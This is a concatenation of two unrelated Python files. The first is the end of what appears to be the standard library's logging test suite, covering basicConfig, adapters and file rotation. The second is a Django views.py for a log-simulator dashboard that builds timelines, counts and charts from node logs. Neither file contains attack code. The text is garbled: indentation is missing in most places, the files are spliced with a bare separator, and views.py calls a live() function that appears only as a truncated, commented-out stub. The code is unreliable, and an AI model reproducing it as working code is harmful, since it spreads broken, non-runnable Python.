def test_with_valueerror_in_flush(self):
self._test_with_failure_in_method('flush', ValueError)
def test_with_valueerror_in_close(self):
self._test_with_failure_in_method('close', ValueError)
def test_with_other_error_in_acquire_without_raise(self):
logging.raiseExceptions = False
self._test_with_failure_in_method('acquire', IndexError)
def test_with_other_error_in_flush_without_raise(self):
logging.raiseExceptions = False
self._test_with_failure_in_method('flush', IndexError)
def test_with_other_error_in_close_without_raise(self):
logging.raiseExceptions = False
self._test_with_failure_in_method('close', IndexError)
def test_with_other_error_in_acquire_with_raise(self):
logging.raiseExceptions = True
self.assertRaises(IndexError, self._test_with_failure_in_method,
'acquire', IndexError)
def test_with_other_error_in_flush_with_raise(self):
logging.raiseExceptions = True
self.assertRaises(IndexError, self._test_with_failure_in_method,
'flush', IndexError)
def test_with_other_error_in_close_with_raise(self):
logging.raiseExceptions = True
self.assertRaises(IndexError, self._test_with_failure_in_method,
'close', IndexError)
class ModuleLevelMiscTest(BaseTest):
"""Test suite for some module level methods."""
def test_disable(self):
old_disable = logging.root.manager.disable
# confirm our assumptions are correct
self.assertEqual(old_disable, 0)
self.addCleanup(logging.disable, old_disable)
logging.disable(83)
self.assertEqual(logging.root.manager.disable, 83)
def _test_log(self, method, level=None):
called = []
patch(self, logging, 'basicConfig',
lambda *a, **kw: called.append((a, kw)))
recording = RecordingHandler()
logging.root.addHandler(recording)
log_method = getattr(logging, method)
if level is not None:
log_method(level, "test me: %r", recording)
else:
log_method("test me: %r", recording)
self.assertEqual(len(recording.records), 1)
record = recording.records[0]
self.assertEqual(record.getMessage(), "test me: %r" % recording)
expected_level = level if level is not None else getattr(logging, method.upper())
self.assertEqual(record.levelno, expected_level)
# basicConfig was not called!
self.assertEqual(called, [])
def test_log(self):
self._test_log('log', logging.ERROR)
def test_debug(self):
self._test_log('debug')
def test_info(self):
self._test_log('info')
def test_warning(self):
self._test_log('warning')
def test_error(self):
self._test_log('error')
def test_critical(self):
self._test_log('critical')
def test_set_logger_class(self):
self.assertRaises(TypeError, logging.setLoggerClass, object)
class MyLogger(logging.Logger):
pass
logging.setLoggerClass(MyLogger)
self.assertEqual(logging.getLoggerClass(), MyLogger)
logging.setLoggerClass(logging.Logger)
self.assertEqual(logging.getLoggerClass(), logging.Logger)
class LogRecordTest(BaseTest):
def test_str_rep(self):
r = logging.makeLogRecord({})
s = str(r)
self.assertTrue(s.startswith('<LogRecord: '))
self.assertTrue(s.endswith('>'))
def test_dict_arg(self):
h = RecordingHandler()
r = logging.getLogger()
r.addHandler(h)
d = {'less' : 'more' }
logging.warning('less is %(less)s', d)
self.assertIs(h.records[0].args, d)
self.assertEqual(h.records[0].message, 'less is more')
r.removeHandler(h)
h.close()
def test_multiprocessing(self):
r = logging.makeLogRecord({})
self.assertEqual(r.processName, 'MainProcess')
try:
import multiprocessing as mp
r = logging.makeLogRecord({})
self.assertEqual(r.processName, mp.current_process().name)
except ImportError:
pass
def test_optional(self):
r = logging.makeLogRecord({})
NOT_NONE = self.assertIsNotNone
if threading:
NOT_NONE(r.thread)
NOT_NONE(r.threadName)
NOT_NONE(r.process)
NOT_NONE(r.processName)
log_threads = logging.logThreads
log_processes = logging.logProcesses
log_multiprocessing = logging.logMultiprocessing
try:
logging.logThreads = False
logging.logProcesses = False
logging.logMultiprocessing = False
r = logging.makeLogRecord({})
NONE = self.assertIsNone
NONE(r.thread)
NONE(r.threadName)
NONE(r.process)
NONE(r.processName)
finally:
logging.logThreads = log_threads
logging.logProcesses = log_processes
logging.logMultiprocessing = log_multiprocessing
class BasicConfigTest(unittest.TestCase):
"""Test suite for logging.basicConfig."""
def setUp(self):
super(BasicConfigTest, self).setUp()
self.handlers = logging.root.handlers
self.saved_handlers = logging._handlers.copy()
self.saved_handler_list = logging._handlerList[:]
self.original_logging_level = logging.root.level
self.addCleanup(self.cleanup)
logging.root.handlers = []
def tearDown(self):
for h in logging.root.handlers[:]:
logging.root.removeHandler(h)
h.close()
super(BasicConfigTest, self).tearDown()
def cleanup(self):
setattr(logging.root, 'handlers', self.handlers)
logging._handlers.clear()
logging._handlers.update(self.saved_handlers)
logging._handlerList[:] = self.saved_handler_list
logging.root.level = self.original_logging_level
def test_no_kwargs(self):
logging.basicConfig()
        # handler defaults to a StreamHandler writing to sys.stderr
self.assertEqual(len(logging.root.handlers), 1)
handler = logging.root.handlers[0]
self.assertIsInstance(handler, logging.StreamHandler)
self.assertEqual(handler.stream, sys.stderr)
formatter = handler.formatter
# format defaults to logging.BASIC_FORMAT
self.assertEqual(formatter._style._fmt, logging.BASIC_FORMAT)
# datefmt defaults to None
self.assertIsNone(formatter.datefmt)
# style defaults to %
self.assertIsInstance(formatter._style, logging.PercentStyle)
# level is not explicitly set
self.assertEqual(logging.root.level, self.original_logging_level)
def test_strformatstyle(self):
with captured_stdout() as output:
logging.basicConfig(stream=sys.stdout, style="{")
logging.error("Log an error")
sys.stdout.seek(0)
self.assertEqual(output.getvalue().strip(),
"ERROR:root:Log an error")
def test_stringtemplatestyle(self):
with captured_stdout() as output:
logging.basicConfig(stream=sys.stdout, style="$")
logging.error("Log an error")
sys.stdout.seek(0)
self.assertEqual(output.getvalue().strip(),
"ERROR:root:Log an error")
def test_filename(self):
logging.basicConfig(filename='test.log')
self.assertEqual(len(logging.root.handlers), 1)
handler = logging.root.handlers[0]
self.assertIsInstance(handler, logging.FileHandler)
expected = logging.FileHandler('test.log', 'a')
self.addCleanup(expected.close)
self.assertEqual(handler.stream.mode, expected.stream.mode)
self.assertEqual(handler.stream.name, expected.stream.name)
def test_filemode(self):
logging.basicConfig(filename='test.log', filemode='wb')
handler = logging.root.handlers[0]
expected = logging.FileHandler('test.log', 'wb')
self.addCleanup(expected.close)
self.assertEqual(handler.stream.mode, expected.stream.mode)
def test_stream(self):
stream = io.StringIO()
self.addCleanup(stream.close)
logging.basicConfig(stream=stream)
self.assertEqual(len(logging.root.handlers), 1)
handler = logging.root.handlers[0]
self.assertIsInstance(handler, logging.StreamHandler)
self.assertEqual(handler.stream, stream)
def test_format(self):
logging.basicConfig(format='foo')
formatter = logging.root.handlers[0].formatter
self.assertEqual(formatter._style._fmt, 'foo')
def test_datefmt(self):
logging.basicConfig(datefmt='bar')
formatter = logging.root.handlers[0].formatter
self.assertEqual(formatter.datefmt, 'bar')
def test_style(self):
logging.basicConfig(style='$')
formatter = logging.root.handlers[0].formatter
self.assertIsInstance(formatter._style, logging.StringTemplateStyle)
def test_level(self):
old_level = logging.root.level
self.addCleanup(logging.root.setLevel, old_level)
logging.basicConfig(level=57)
self.assertEqual(logging.root.level, 57)
# Test that second call has no effect
logging.basicConfig(level=58)
self.assertEqual(logging.root.level, 57)
def test_incompatible(self):
assertRaises = self.assertRaises
handlers = [logging.StreamHandler()]
stream = sys.stderr
assertRaises(ValueError, logging.basicConfig, filename='test.log',
stream=stream)
assertRaises(ValueError, logging.basicConfig, filename='test.log',
handlers=handlers)
assertRaises(ValueError, logging.basicConfig, stream=stream,
handlers=handlers)
def test_handlers(self):
handlers = [
logging.StreamHandler(),
logging.StreamHandler(sys.stdout),
logging.StreamHandler(),
]
f = logging.Formatter()
handlers[2].setFormatter(f)
logging.basicConfig(handlers=handlers)
self.assertIs(handlers[0], logging.root.handlers[0])
self.assertIs(handlers[1], logging.root.handlers[1])
self.assertIs(handlers[2], logging.root.handlers[2])
self.assertIsNotNone(handlers[0].formatter)
self.assertIsNotNone(handlers[1].formatter)
self.assertIs(handlers[2].formatter, f)
self.assertIs(handlers[0].formatter, handlers[1].formatter)
def _test_log(self, method, level=None):
# logging.root has no handlers so basicConfig should be called
called = []
old_basic_config = logging.basicConfig
def my_basic_config(*a, **kw):
old_basic_config()
old_level = logging.root.level
logging.root.setLevel(100) # avoid having messages in stderr
self.addCleanup(logging.root.setLevel, old_level)
called.append((a, kw))
patch(self, logging, 'basicConfig', my_basic_config)
log_method = getattr(logging, method)
if level is not None:
log_method(level, "test me")
else:
log_method("test me")
# basicConfig was called with no arguments
self.assertEqual(called, [((), {})])
def test_log(self):
self._test_log('log', logging.WARNING)
def test_debug(self):
self._test_log('debug')
def test_info(self):
self._test_log('info')
def test_warning(self):
self._test_log('warning')
def test_error(self):
self._test_log('error')
def test_critical(self):
self._test_log('critical')
class LoggerAdapterTest(unittest.TestCase):
def setUp(self):
super(LoggerAdapterTest, self).setUp()
old_handler_list = logging._handlerList[:]
self.recording = RecordingHandler()
self.logger = logging.root
self.logger.addHandler(self.recording)
self.addCleanup(self.logger.removeHandler, self.recording)
self.addCleanup(self.recording.close)
def cleanup():
logging._handlerList[:] = old_handler_list
self.addCleanup(cleanup)
self.addCleanup(logging.shutdown)
self.adapter = logging.LoggerAdapter(logger=self.logger, extra=None)
def test_exception(self):
msg = 'testing exception: %r'
exc = None
try:
1 / 0
except ZeroDivisionError as e:
exc = e
self.adapter.exception(msg, self.recording)
self.assertEqual(len(self.recording.records), 1)
record = self.recording.records[0]
self.assertEqual(record.levelno, logging.ERROR)
self.assertEqual(record.msg, msg)
self.assertEqual(record.args, (self.recording,))
self.assertEqual(record.exc_info,
(exc.__class__, exc, exc.__traceback__))
def test_critical(self):
msg = 'critical test! %r'
self.adapter.critical(msg, self.recording)
self.assertEqual(len(self.recording.records), 1)
record = self.recording.records[0]
self.assertEqual(record.levelno, logging.CRITICAL)
self.assertEqual(record.msg, msg)
self.assertEqual(record.args, (self.recording,))
def test_is_enabled_for(self):
old_disable = self.adapter.logger.manager.disable
self.adapter.logger.manager.disable = 33
self.addCleanup(setattr, self.adapter.logger.manager, 'disable',
old_disable)
self.assertFalse(self.adapter.isEnabledFor(32))
def test_has_handlers(self):
self.assertTrue(self.adapter.hasHandlers())
for handler in self.logger.handlers:
self.logger.removeHandler(handler)
self.assertFalse(self.logger.hasHandlers())
self.assertFalse(self.adapter.hasHandlers())
class LoggerTest(BaseTest):
def setUp(self):
super(LoggerTest, self).setUp()
self.recording = RecordingHandler()
self.logger = logging.Logger(name='blah')
self.logger.addHandler(self.recording)
self.addCleanup(self.logger.removeHandler, self.recording)
self.addCleanup(self.recording.close)
self.addCleanup(logging.shutdown)
def test_set_invalid_level(self):
self.assertRaises(TypeError, self.logger.setLevel, object())
def test_exception(self):
msg = 'testing exception: %r'
exc = None
try:
1 / 0
except ZeroDivisionError as e:
exc = e
self.logger.exception(msg, self.recording)
self.assertEqual(len(self.recording.records), 1)
record = self.recording.records[0]
self.assertEqual(record.levelno, logging.ERROR)
self.assertEqual(record.msg, msg)
self.assertEqual(record.args, (self.recording,))
self.assertEqual(record.exc_info,
(exc.__class__, exc, exc.__traceback__))
def test_log_invalid_level_with_raise(self):
old_raise = logging.raiseExceptions
        self.addCleanup(setattr, logging, 'raiseExceptions', old_raise)
logging.raiseExceptions = True
self.assertRaises(TypeError, self.logger.log, '10', 'test message')
def test_log_invalid_level_no_raise(self):
old_raise = logging.raiseExceptions
        self.addCleanup(setattr, logging, 'raiseExceptions', old_raise)
logging.raiseExceptions = False
self.logger.log('10', 'test message') # no exception happens
def test_find_caller_with_stack_info(self):
called = []
patch(self, logging.traceback, 'print_stack',
lambda f, file: called.append(file.getvalue()))
self.logger.findCaller(stack_info=True)
self.assertEqual(len(called), 1)
self.assertEqual('Stack (most recent call last):\n', called[0])
def test_make_record_with_extra_overwrite(self):
name = 'my record'
level = 13
fn = lno = msg = args = exc_info = func = sinfo = None
rv = logging._logRecordFactory(name, level, fn, lno, msg, args,
exc_info, func, sinfo)
for key in ('message', 'asctime') + tuple(rv.__dict__.keys()):
extra = {key: 'some value'}
self.assertRaises(KeyError, self.logger.makeRecord, name, level,
fn, lno, msg, args, exc_info,
extra=extra, sinfo=sinfo)
def test_make_record_with_extra_no_overwrite(self):
name = 'my record'
level = 13
fn = lno = msg = args = exc_info = func = sinfo = None
extra = {'valid_key': 'some value'}
result = self.logger.makeRecord(name, level, fn, lno, msg, args,
exc_info, extra=extra, sinfo=sinfo)
self.assertIn('valid_key', result.__dict__)
def test_has_handlers(self):
self.assertTrue(self.logger.hasHandlers())
for handler in self.logger.handlers:
self.logger.removeHandler(handler)
self.assertFalse(self.logger.hasHandlers())
def test_has_handlers_no_propagate(self):
child_logger = logging.getLogger('blah.child')
child_logger.propagate = False
self.assertFalse(child_logger.hasHandlers())
def test_is_enabled_for(self):
old_disable = self.logger.manager.disable
self.logger.manager.disable = 23
self.addCleanup(setattr, self.logger.manager, 'disable', old_disable)
self.assertFalse(self.logger.isEnabledFor(22))
def test_root_logger_aliases(self):
root = logging.getLogger()
self.assertIs(root, logging.root)
self.assertIs(root, logging.getLogger(None))
self.assertIs(root, logging.getLogger(''))
self.assertIs(root, logging.getLogger('foo').root)
self.assertIs(root, logging.getLogger('foo.bar').root)
self.assertIs(root, logging.getLogger('foo').parent)
self.assertIsNot(root, logging.getLogger('\0'))
self.assertIsNot(root, logging.getLogger('foo.bar').parent)
def test_invalid_names(self):
self.assertRaises(TypeError, logging.getLogger, any)
self.assertRaises(TypeError, logging.getLogger, b'foo')
class BaseFileTest(BaseTest):
"Base class for handler tests that write log files"
def setUp(self):
BaseTest.setUp(self)
fd, self.fn = tempfile.mkstemp(".log", "test_logging-2-")
os.close(fd)
self.rmfiles = []
def tearDown(self):
for fn in self.rmfiles:
os.unlink(fn)
if os.path.exists(self.fn):
os.unlink(self.fn)
BaseTest.tearDown(self)
def assertLogFile(self, filename):
"Assert a log file is there and register it for deletion"
self.assertTrue(os.path.exists(filename),
msg="Log file %r does not exist" % filename)
self.rmfiles.append(filename)
class FileHandlerTest(BaseFileTest):
def test_delay(self):
os.unlink(self.fn)
fh = logging.FileHandler(self.fn, delay=True)
self.assertIsNone(fh.stream)
self.assertFalse(os.path.exists(self.fn))
fh.handle(logging.makeLogRecord({}))
self.assertIsNotNone(fh.stream)
self.assertTrue(os.path.exists(self.fn))
fh.close()
class RotatingFileHandlerTest(BaseFileTest):
def next_rec(self):
return logging.LogRecord('n', logging.DEBUG, 'p', 1,
self.next_message(), None, None, None)
def test_should_not_rollover(self):
        # If maxBytes is zero rollover never occurs
rh = logging.handlers.RotatingFileHandler(self.fn, maxBytes=0)
self.assertFalse(rh.shouldRollover(None))
rh.close()
def test_should_rollover(self):
rh = logging.handlers.RotatingFileHandler(self.fn, maxBytes=1)
self.assertTrue(rh.shouldRollover(self.next_rec()))
rh.close()
def test_file_created(self):
# checks that the file is created and assumes it was created
# by us
rh = logging.handlers.RotatingFileHandler(self.fn)
rh.emit(self.next_rec())
self.assertLogFile(self.fn)
rh.close()
def test_rollover_filenames(self):
def namer(name):
return name + ".test"
rh = logging.handlers.RotatingFileHandler(
self.fn, backupCount=2, maxBytes=1)
rh.namer = namer
rh.emit(self.next_rec())
self.assertLogFile(self.fn)
rh.emit(self.next_rec())
self.assertLogFile(namer(self.fn + ".1"))
rh.emit(self.next_rec())
self.assertLogFile(namer(self.fn + ".2"))
self.assertFalse(os.path.exists(namer(self.fn + ".3")))
rh.close()
@requires_zlib
def test_rotator(self):
def namer(name):
return name + ".gz"
def rotator(source, dest):
with open(source, "rb") as sf:
data = sf.read()
compressed = zlib.compress(data, 9)
with open(dest, "wb") as df:
df.write(compressed)
os.remove(source)
rh = logging.handlers.RotatingFileHandler(
self.fn, backupCount=2, maxBytes=1)
rh.rotator = rotator
rh.namer = namer
m1 = self.next_rec()
rh.emit(m1)
self.assertLogFile(self.fn)
m2 = self.next_rec()
rh.emit(m2)
fn = namer(self.fn + ".1")
self.assertLogFile(fn)
newline = os.linesep
with open(fn, "rb") as f:
compressed = f.read()
data = zlib.decompress(compressed)
self.assertEqual(data.decode("ascii"), m1.msg + newline)
rh.emit(self.next_rec())
fn = namer(self.fn + ".2")
self.assertLogFile(fn)
with open(fn, "rb") as f:
compressed = f.read()
data = zlib.decompress(compressed)
self.assertEqual(data.decode("ascii"), m1.msg + newline)
rh.emit(self.next_rec())
fn = namer(self.fn + ".2")
with open(fn, "rb") as f:
compressed = f.read()
data = zlib.decompress(compressed)
self.assertEqual(data.decode("ascii"), m2.msg + newline)
self.assertFalse(os.path.exists(namer(self.fn + ".3")))
rh.close()
class TimedRotatingFileHandlerTest(BaseFileTest):
# other test methods added below
def test_rollover(self):
fh = logging.handlers.TimedRotatingFileHandler(self.fn, 'S',
backupCount=1)
fmt = logging.Formatter('%(asctime)s %(message)s')
fh.setFormatter(fmt)
r1 = logging.makeLogRecord({'msg': 'testing - initial'})
fh.emit(r1)
self.assertLogFile(self.fn)
time.sleep(1.1) # a little over a second ...
r2 = logging.makeLogRecord({'msg': 'testing - after delay'})
fh.emit(r2)
fh.close()
# At this point, we should have a recent rotated file which we
# can test for the existence of. However, in practice, on some
# machines which run really slowly, we don't know how far back
# in time to go to look for the log file. So, we go back a fair
# bit, and stop as soon as we see a rotated file. In theory this
# could of course still fail, but the chances are lower.
found = False
now = datetime.datetime.now()
GO_BACK = 5 * 60 # seconds
for secs in range(GO_BACK):
prev = now - datetime.timedelta(seconds=secs)
fn = self.fn + prev.strftime(".%Y-%m-%d_%H-%M-%S")
found = os.path.exists(fn)
if found:
self.rmfiles.append(fn)
break
msg = 'No rotated files found, went back %d seconds' % GO_BACK
if not found:
#print additional diagnostics
dn, fn = os.path.split(self.fn)
files = [f for f in os.listdir(dn) if f.startswith(fn)]
print('Test time: %s' % now.strftime("%Y-%m-%d %H-%M-%S"), file=sys.stderr)
print('The only matching files are: %s' % files, file=sys.stderr)
for f in files:
print('Contents of %s:' % f)
path = os.path.join(dn, f)
with open(path, 'r') as tf:
print(tf.read())
self.assertTrue(found, msg=msg)
def test_invalid(self):
assertRaises = self.assertRaises
assertRaises(ValueError, logging.handlers.TimedRotatingFileHandler,
self.fn, 'X', delay=True)
assertRaises(ValueError, logging.handlers.TimedRotatingFileHandler,
self.fn, 'W', delay=True)
assertRaises(ValueError, logging.handlers.TimedRotatingFileHandler,
self.fn, 'W7', delay=True)
def secs(**kw):
return datetime.timedelta(**kw) // datetime.timedelta(seconds=1)
for when, exp in (('S', 1),
('M', 60),
('H', 60 * 60),
('D', 60 * 60 * 24),
('MIDNIGHT', 60 * 60 * 24),
# current time (epoch start) is a Thursday, W0 means Monday
('W0', secs(days=4, hours=24)),
):
def test_compute_rollover(self, when=when, exp=exp):
rh = logging.handlers.TimedRotatingFileHandler(
self.fn, when=when, interval=1, backupCount=0, utc=True)
currentTime = 0.0
actual = rh.computeRollover(currentTime)
if exp != actual:
# Failures occur on some systems for MIDNIGHT and W0.
# Print detailed calculation for MIDNIGHT so we can try to see
# what's going on
if when == 'MIDNIGHT':
try:
if rh.utc:
t = time.gmtime(currentTime)
else:
t = time.localtime(currentTime)
currentHour = t[3]
currentMinute = t[4]
currentSecond = t[5]
# r is the number of seconds left between now and midnight
r = logging.handlers._MIDNIGHT - ((currentHour * 60 +
currentMinute) * 60 +
currentSecond)
result = currentTime + r
print('t: %s (%s)' % (t, rh.utc), file=sys.stderr)
print('currentHour: %s' % currentHour, file=sys.stderr)
print('currentMinute: %s' % currentMinute, file=sys.stderr)
print('currentSecond: %s' % currentSecond, file=sys.stderr)
print('r: %s' % r, file=sys.stderr)
print('result: %s' % result, file=sys.stderr)
except Exception:
print('exception in diagnostic code: %s' % sys.exc_info()[1], file=sys.stderr)
self.assertEqual(exp, actual)
rh.close()
setattr(TimedRotatingFileHandlerTest, "test_compute_rollover_%s" % when, test_compute_rollover)
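# Worked arithmetic for the 'W0' expectation above (a sketch of the reasoning):
# at the epoch (Thursday, 1 Jan 1970, 00:00 UTC) the handler first rolls over at
# the next midnight (24 hours later), then waits (0 - 3 + 7) % 7 = 4 more days to
# reach Monday, so the expected value is secs(days=4, hours=24) == 5 * 86400 seconds.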
@unittest.skipUnless(win32evtlog, 'win32evtlog/win32evtlogutil required for this test.')
class NTEventLogHandlerTest(BaseTest):
def test_basic(self):
logtype = 'Application'
elh = win32evtlog.OpenEventLog(None, logtype)
num_recs = win32evtlog.GetNumberOfEventLogRecords(elh)
h = logging.handlers.NTEventLogHandler('test_logging')
r = logging.makeLogRecord({'msg': 'Test Log Message'})
h.handle(r)
h.close()
# Now see if the event is recorded
self.assertTrue(num_recs < win32evtlog.GetNumberOfEventLogRecords(elh))
flags = win32evtlog.EVENTLOG_BACKWARDS_READ | \
win32evtlog.EVENTLOG_SEQUENTIAL_READ
found = False
GO_BACK = 100
events = win32evtlog.ReadEventLog(elh, flags, GO_BACK)
for e in events:
if e.SourceName != 'test_logging':
continue
msg = win32evtlogutil.SafeFormatMessage(e, logtype)
if msg != 'Test Log Message\r\n':
continue
found = True
break
msg = 'Record not found in event log, went back %d records' % GO_BACK
self.assertTrue(found, msg=msg)
# Set the locale to the platform-dependent default. I have no idea
# why the test does this, but in any case we save the current locale
# first and restore it at the end.
@run_with_locale('LC_ALL', '')
def test_main():
run_unittest(BuiltinLevelsTest, BasicFilterTest,
CustomLevelsAndFiltersTest, HandlerTest, MemoryHandlerTest,
ConfigFileTest, SocketHandlerTest, DatagramHandlerTest,
MemoryTest, EncodingTest, WarningsTest, ConfigDictTest,
ManagerTest, FormatterTest, BufferingFormatterTest,
StreamHandlerTest, LogRecordFactoryTest, ChildLoggerTest,
QueueHandlerTest, ShutdownTest, ModuleLevelMiscTest,
BasicConfigTest, LoggerAdapterTest, LoggerTest,
SMTPHandlerTest, FileHandlerTest, RotatingFileHandlerTest,
LastResortTest, LogRecordTest, ExceptionTest,
SysLogHandlerTest, HTTPHandlerTest, NTEventLogHandlerTest,
TimedRotatingFileHandlerTest
)
if __name__ == "__main__":
test_main()
|
views.py
|
from threading import Thread
import pandas
import matplotlib.pyplot as plt
import shutil
import os
import subprocess
import time
from django.template import loader
import signal
from django.http import HttpResponse
from django.shortcuts import render, redirect
import re
threads=[]
stop=False
proc1 = None
live_flag=0
live_n=None
live_p=None
live_number_of_lines=None
live_pattern=None
req = None
n_global=None
p_global=None
running_status=0
def IndexView(request):
global stop
global threads
global live_flag
global live_n
global live_p
global live_number_of_lines
global live_pattern
global req
global n_global
global proc1
global p_global
global running_status
variable=0
variable2=0
data=""
live_flag=0
if live_flag ==1:
if ("Live_Stop" in request.POST):
live_flag = 0
template = loader.get_template('index.html')
context = {'variable': variable, 'data': data, 'variable2': variable2,
}
return HttpResponse(template.render(context, request))
data2=[]
list=[]
time.sleep(1)
live(live_n, live_p, live_number_of_lines, "a")
print("Harsh Hi")
variable = 0
variable2 = 1
for i in range(live_n):
f = open("/anode%d" % (i + 1), "r")
list.append(i)
data = f.read()
data2.append((data, i))
print(data2)
print(len(data2))
template = loader.get_template('index.html')
context = {'variable': variable, 'data': data, 'data2': data2, 'variable2': variable2, 'list': list,
}
return HttpResponse(template.render(context, request))
else:
if request.method == "POST":
print(request)
if request.POST["value_n"] :
value_n = request.POST["value_n"]
if value_n != "":
value_n = int(value_n)
n_global=value_n
print(value_n)
if request.POST["value_p"]:
value_p = request.POST["value_p"]
if value_p != "":
value_p = int(value_p)
p_global=value_p
print(value_p)
if ("Start" in request.POST) :
process = Thread(target=run_script, args=[value_n, value_p])
process.start()
threads.append(process)
print(threads)
running_status=1
if ("Stop" in request.POST) and (live_flag != 1):
while(os.path.isdir('log_simulator')):
os.system('rm -rf log_simulator')
print("####################STOPPED#######################")
stop = False
for process in threads:
process.join()
running_status=0
if ("Print" in request.POST):
n_val = int(request.POST["n"])
p_val = int(request.POST["p"])
pattern = request.POST["pattern"]
number_lines = int(request.POST["number_of_lines"])
headTen(n_val, p_val, number_lines, pattern, "/home/harsh/PycharmProjects/CloudInit/log.txt")
f = open("log.txt", "r")
data = f.read()
variable = 1
data2 = []
list = []
template = loader.get_template('index.html')
context = {'variable': variable, 'data': data, 'data2': data2, 'variable2': variable2, 'list': list, 'running_status':running_status,
}
return HttpResponse(template.render(context, request))
else:
template = loader.get_template('index.html')
context = {'variable': variable, 'data': data, 'variable2': variable2, 'running_status':running_status,
}
return HttpResponse(template.render(context, request))
def LiveView(request):
global live_flag
global live_n
global live_p
global live_number_of_lines
global live_pattern
global n_global
variable2=0
if live_flag ==1:
if ("Live_Stop" in request.POST):
live_flag = 0
template = loader.get_template('live.html')
context = {'variable2': variable2,
}
return HttpResponse(template.render(context, request))
data2=[]
list=[]
time.sleep(1)
live(live_n, live_p, live_number_of_lines, "a")
variable2 = 1
for i in range(live_n):
df = pandas.read_csv("anode%d.csv"%(i+1), sep=',')
data = df.to_html()
list.append(i)
data2.append((data, i))
template = loader.get_template('live.html')
context = {'data2': data2, 'variable2': variable2, 'list': list,
}
return HttpResponse(template.render(context, request))
else:
if request.method == "POST":
data2 = []
list = []
if ("Print_live" in request.POST):
live_n = n_global
live_p = int(request.POST["p_live"])
live_number_of_lines = int(request.POST["live_number_of_lines"])
live_flag = 1
if live_flag == 1:
time.sleep(1)
live(live_n, live_p, live_number_of_lines, "a")
variable = 0
variable2 = 1
for i in range(live_n):
df = pandas.read_csv("anode%d.csv" % (i + 1), sep=',')
data = df.to_html()
list.append(i)
data2.append((data, i))
template = loader.get_template('live.html')
context = { 'data2': data2, 'variable2': variable2, 'list': list,
}
return HttpResponse(template.render(context, request))
template = loader.get_template('live.html')
context = { 'data2': data2, 'variable2': variable2, 'list': list,
}
return HttpResponse(template.render(context, request))
else:
template = loader.get_template('live.html')
context = {'variable2': variable2,
}
return HttpResponse(template.render(context, request))
def TimeView(request):
variable3 = 0
data_time = ""
global n_global
print(request.POST)
if (request.method == "POST"):
n_time = int(request.POST['n_time'])
p_time = int(request.POST['p_time'])
start = request.POST['date_start']
end = request.POST['date_end']
live(n_global,p_time,1000,"a")
TimeData(n_time, p_time, start, end)
df = pandas.read_csv("time.csv", sep=',')
data_time = df.to_html()
variable3 = 1
template = loader.get_template('time.html')
context = {'variable3': variable3, 'data_time': data_time,
}
return HttpResponse(template.render(context, request))
else:
template = loader.get_template('time.html')
context = {'variable3': variable3, 'data_time': data_time,
}
return HttpResponse(template.render(context, request))
def TimelineView(request):
global n_global
global p_global
variable=0
data_timeline =[]
if(request.method == 'POST'):
number_of_lines = int(request.POST['number_of_lines'])
timeline(n_global,p_global,number_of_lines)
df = pandas.read_csv("timeline.csv", sep=',')
data_timeline = df.to_html()
variable=1
print(data_timeline)
template = loader.get_template('timeline.html')
context = {'variable':variable, 'data_timeline':data_timeline}
return HttpResponse(template.render(context,request))
else:
variable=0
data_timeline=[]
template = loader.get_template('timeline.html')
context = {'variable':variable, 'data_timeline':data_timeline}
return HttpResponse(template.render(context,request))
def GraphView(request):
variable=0
global n_global
if (request.method == "POST"):
variable=1
n_graph = n_global
p_graph = int(request.POST['p_graph'])
num_graph = int(request.POST['num_graph'])
search = request.POST['search']
process_counts(n_graph, p_graph, num_graph, search)
list=[]
data=[]
for i in range(n_graph):
list.append((i,i+1))
data.append(("plotNode_%d.png"%(i+1),"plotNode_pie_%d.png"%(i+1),i))
print(data)
print(list)
template = loader.get_template('graph.html')
context = {'variable': variable,
'list':list,
'data':data
}
return HttpResponse(template.render(context, request))
else:
template = loader.get_template('graph.html')
context = {'variable': variable,
}
return HttpResponse(template.render(context, request))
def timeline(n, p, num):
    file_path2 = "log_simulator/"
    # Write the CSV header once, then append one row per matching log line
    # for every node/process pair.
    FR = open("timeline.csv", "w")
    FR.write("Date,Time,Node,Process,Tag,File,Exception" + "\n")
    FR.close()
    FR = open("timeline.csv", "a+")
    i = 1
    while i <= n:
        j = 1
        while j <= p:
            filename = file_path2 + 'HackNode' + str(i) + "/Process" + str(j) + ".log"
            lines = "".join(tail(filename, num)).split('\n')
            for line in lines:
                l = line.split()
                if re.match(r"^\d", line) is not None:
                    FR.write(l[0] + " , " + str(l[1]) + " , " + str(i) + " , " + str(j) + " , " + l[2] + " , " + l[3] + " , " + " ".join(l[4:]) + "\n")
                    print(str(l[0]) + "| " + str(l[1]) + "| NODE :" + str(i) + "| PROCESS :" + str(j) + "| MATCH LINE:" + str(" ".join(l[2:])) + "\n")
            j += 1
        i += 1
    FR.close()
def process_counts(n, process, num, extra):
i = 1
extra = extra.split(',')
file_path1='log_simulator/'
while i <= n:
filename = file_path1 + 'HackNode' + str(i) + "/Process" + str(process) + ".log"
count_info = 0
count_dbg = 0
count_error = 0
string = "".join(tail(filename, num))
extra_y = [0] * len(extra)
for line in string.split('\n'):
print(line)
if line.find('DBG') >= 0:
count_dbg += 1
elif line.find('ERROR') >= 0:
count_error += 1
elif line.find('INFO') >= 0:
count_info += 1
for j in range(0, len(extra)):
if re.search(extra[j], line, re.I):
extra_y[j] += 1
x = ["INFO", "DBG", "ERROR"] + extra
y = [count_info, count_dbg, count_error] + extra_y
barplot(x, y, i, num)
i += 1
def barplot(x, y, i, num):
# my_color=tuple([round(i/(len(x)+1),1) for i in range(1,len(x)+1)])
# print(my_color)
plt.bar(x, y)
plt.xlabel('Category')
plt.ylabel('Number of occurrence in last ' + str(num) + ' logs in node ' + str(i))
plt.savefig('media/plotNode_' + str(i))
plt.close()
plt.pie(y, labels=x)
plt.savefig('media/plotNode_pie_' + str(i))
plt.close()
def run_script(n,p):
global proc1
proc1 = subprocess.Popen("python2 log_simulator.zip -n %d -p %d" %(n,p), shell=True)
def headTen(node, process, num, pattern, outputfilename):
    # Copy the first `num` lines matching `pattern` from the node/process log into outputfilename.
    filename = 'log_simulator/HackNode' + str(node) + "/Process" + str(process) + ".log"
    FO = open(filename, 'r')
    FR = open(outputfilename, 'w')
    count = 0
    while count < num:
        loglines = FO.readline()
        if not loglines:
            # End of file reached before `num` matches; stop instead of looping forever.
            break
        if loglines.find(pattern) >= 0:
            FR.write(loglines)
            count += 1
    FO.close()
    FR.close()
# def live(n,process,num,pattern,outputfilename):
# file_path1 = '/home/harsh/PycharmProjects/CloudInit/log_simulator/'
# delay=0
# time.sleep(delay)
# i=1
# while i <= n:
